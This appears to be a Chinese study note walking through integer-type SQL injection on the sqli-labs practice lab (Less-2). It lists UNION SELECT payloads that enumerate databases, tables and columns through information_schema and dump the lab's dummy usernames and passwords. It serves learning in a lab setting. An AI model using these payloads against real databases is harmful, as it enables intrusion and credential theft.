sql整数性注入

sql整数型注入

数据库注入判断流程

1.判断是否有注入
2.判断注入类型
3.语句能否修改
4.能否执行
5.能否获得想要的数据

数据库注入语句（sqllab_less2)

1.查字段 union select 1,2,3
2.查所有库 union select 1,group_concat(schema_name),3 from information_schema.schemata #
information_schema,challenges,mysql,performance_schema,security

3.查询当前库union select 1,database(),3 #

security

4.查询当前库中的表union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

emails,referers,uagents,users

5.查询user表的字段 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' #

id,username,password

6.查询单个的username，password union select 1,username,password from security.users #

7.查询所有的username，passwordunion select 1,group_concat(username),group_concat(password) from security.users #

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

8.username和password一一对应的表示union select 1,group_concat(concat_ws(':',username,password)),3 #